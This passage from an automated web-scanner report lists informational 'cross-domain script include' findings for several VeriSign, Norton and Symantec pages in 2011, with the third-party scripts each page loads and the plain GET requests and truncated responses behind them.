href='//www.verisign.be/'> VeriSign Belgium</a>...[SNIP]... <li> <a href='//www.verisign.dk/'> VeriSign Denmark</a>...[SNIP]... <li> <a href='//www.verisign.fr/'> VeriSign France</a>...[SNIP]... <li> <a href='//www.verisign.de/'> VeriSign Germany</a>...[SNIP]... <li> <a href='//www.verisign.it/'> VeriSign Italy</a>...[SNIP]... <li> <a href='//www.verisign.es/'> VeriSign Spain</a>...[SNIP]... <li> <a href='//www.verisign.se/'> VeriSign Sweden</a>...[SNIP]... <li> <a href='//www.verisign.ch/'> VeriSign Switzerland</a>...[SNIP]... <li> <a href='//www.verisignchina.com.cn/'> VeriSign China</a>...[SNIP]... <li> <a href='//www.verisign.in/'> VeriSign India</a>...[SNIP]... 
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'> Contact VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'> About VeriSign</a>...[SNIP]... <li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'> News</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>). Symantec products include <a href='//us.norton.com/index.jsp'> Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'> Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'> PC Tools</a>...[SNIP]...
15. Cross-domain script include
There are 45 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
15.1. http://blogs.verisign.com/web-user-experience/
Summary
Severity: Information
Confidence: Certain
Host: http://blogs.verisign.com
Path: /web-user-experience/
Issue detail
The response dynamically includes the following scripts from other domains:
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/javascripts/typepad.js
http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&count=5
https://ssl.google-analytics.com/urchin.js
Request
GET /web-user-experience/ HTTP/1.1
Host: blogs.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:59 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.0.4 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 70620 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard"> <head> <tit...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... 
<span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... 
<span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... <span style="font-size:11px;"> <script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php" type="text/javascript" charset="utf-8"> </script>...[SNIP]... </a> <script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://twitter.com/javascripts/typepad.js"> </script><script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&count=5"> </script>...[SNIP]... </div><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
15.2. http://community.norton.com/norton/
Summary
Severity: Information
Confidence: Certain
Host: http://community.norton.com
Path: /norton/
Issue detail
The response dynamically includes the following scripts from other domains:
http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
Request
GET /norton/ HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:45 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 81813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"> </script>...[SNIP]...
15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
Summary
Severity: Information
Confidence: Certain
Host: http://community.norton.com
Path: /t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
Issue detail
The response dynamically includes the following scripts from other domains:
http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
Request
GET /t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:46 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 339433 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"> </script>...[SNIP]...
15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
Summary
Severity: Information
Confidence: Certain
Host: http://community.norton.com
Path: /t5/Norton-Protection-Blog/bg-p/npb1
Issue detail
The response dynamically includes the following scripts from other domains:
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&height=370&playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&height=370&playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&height=370&playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&height=360&playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&height=338&playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&width=600&wmode=opaque
http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
Request
GET /t5/Norton-Protection-Blog/bg-p/npb1 HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:48 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 422706 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <![endif]--><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&height=370&playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&width=640&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&height=338&playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&width=600&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&height=370&playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&width=640&wmode=opaque"> </script>...[SNIP]... </div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&height=370&playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&width=640&wmode=opaque"> </script>...[SNIP]... 
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&height=360&playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&width=640&wmode=opaque"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"> </script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"> </script>...[SNIP]...
15.5. http://de.community.norton.com/
Summary
Severity: Information
Confidence: Certain
Host: http://de.community.norton.com
Path: /
Issue detail
The response dynamically includes the following scripts from other domains:
http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js
http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
Request
GET / HTTP/1.1
Host: de.community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:46 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 59970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <link class="lia-link...[SNIP]... <meta name="om.user_id" content="" /><script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n"> </"></script> <link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" /><script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"> </script>...[SNIP]... <!-- START OMNITURE JAVASCRIPT INCLUDES --><script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script><script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... <!-- END SITECATALYST CODE VERSION: H.15.1. --> <script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js"> </script><script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js"> </script>...[SNIP]...
15.6. http://free.pctools.com/free-antivirus/
Summary
Severity: Information
Confidence: Certain
Host: http://free.pctools.com
Path: /free-antivirus/
Issue detail
The response dynamically includes the following scripts from other domains:
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&count=1
Request
GET /free-antivirus/ HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Fri, 09 Sep 2011 21:42:00 GMT Date: Fri, 09 Sep 2011 21:42:00 GMT Content-Length: 17565 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Free AntiVirus & An...[SNIP]... </div> <script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"> <!--mce:0--></script> <script src="http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&count=1" type="text/javascript"> <!--mce:1-->...[SNIP]...
15.7. http://investor.symantec.com/phoenix.zhtml
Summary
Severity: Information
Confidence: Certain
Host: http://investor.symantec.com
Path: /phoenix.zhtml
Issue detail
The response dynamically includes the following scripts from other domains:
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://widgets.twimg.com/j/2/widget.js
Request
GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=58 Date: Fri, 09 Sep 2011 21:42:06 GMT Content-Length: 39751 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl...[SNIP]... <link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"> </script>...[SNIP]... </div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"> </script>...[SNIP]...
15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/code-signing-support/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/digital-id-support/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.10. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/mpki-support/index.html
Issue detail
The response dynamically includes the following script from another domain: https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index
Issue detail
The response dynamically includes the following script from another domain: https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]...
15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity: Information
